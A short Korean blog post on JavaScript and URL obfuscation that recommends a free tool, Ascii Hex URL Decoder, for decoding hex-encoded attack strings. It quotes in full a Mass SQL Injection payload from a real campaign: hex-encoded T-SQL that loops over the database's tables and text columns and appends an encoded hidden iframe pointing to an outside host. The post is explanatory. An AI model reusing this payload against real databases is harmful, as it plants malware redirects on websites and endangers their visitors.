'obfuscation'에 해당되는 글 1건

  1. 2010.09.17 암호화된 URL 문자열을 해독하자 - Ascii Hex URL Decoder (1)
프로그래밍 소스를 보호하기 위해서 전통적인 방법으로는 컴파일러로 컴파일해서 실행 파일 즉 바이너리로 변환하는 방식이 애용되어 왔습니다.

하지만, HTML이나 자바스크립트(JS)는 모두 소스가 실시간으로 실행되어 보여주기 때문에 소스를 보호하기 위한 새로운 수단이 필요해 졌습니다.

일명 난독화(Obfuscation)라고 부르기도 하는데, 소스를 남들이 봐도 알아 볼 수 없도록 다양한 기술을 이용하여 변조합니다. 물론, 동작 기능에는 전혀 문제가 없습니다.

최근에 바이러스와 같은 악성 프로그램이 배포되는 과정에서도 URL을 암호화하는 경향이 있으며, 특히 Mass SQL Injection 공격에서도 종종 사용됩니다.

아래 코드는 지난 8월 달에 발생한 Mass SQL Injection 공격에 사용된 패턴으로 첫줄 중간 부분에 보면, cast(0x...)로 시작하는 문자열이 있습니다.

declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320 566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452
c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420
612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7
220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736
f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27
2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929
2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363
8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232
3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323
6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228
31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054
61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--


이 부분을 해독하여 볼 수 있는 프로그램으로 Ascii Hex URL Decoder를 소개합니다. 이 프로그램은 무료로 다운로드하여 사용할 수 있습니다.


아래 화면은 Ascii Hex URL Decoder를 실행하고, 암호화된 데이터를 확인하는 것으로 형식을 정확히 입력해야 합니다. CAST(0x숫자 AS VARCHAR)

감사합니다.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus


    Web Analytics Blogs Directory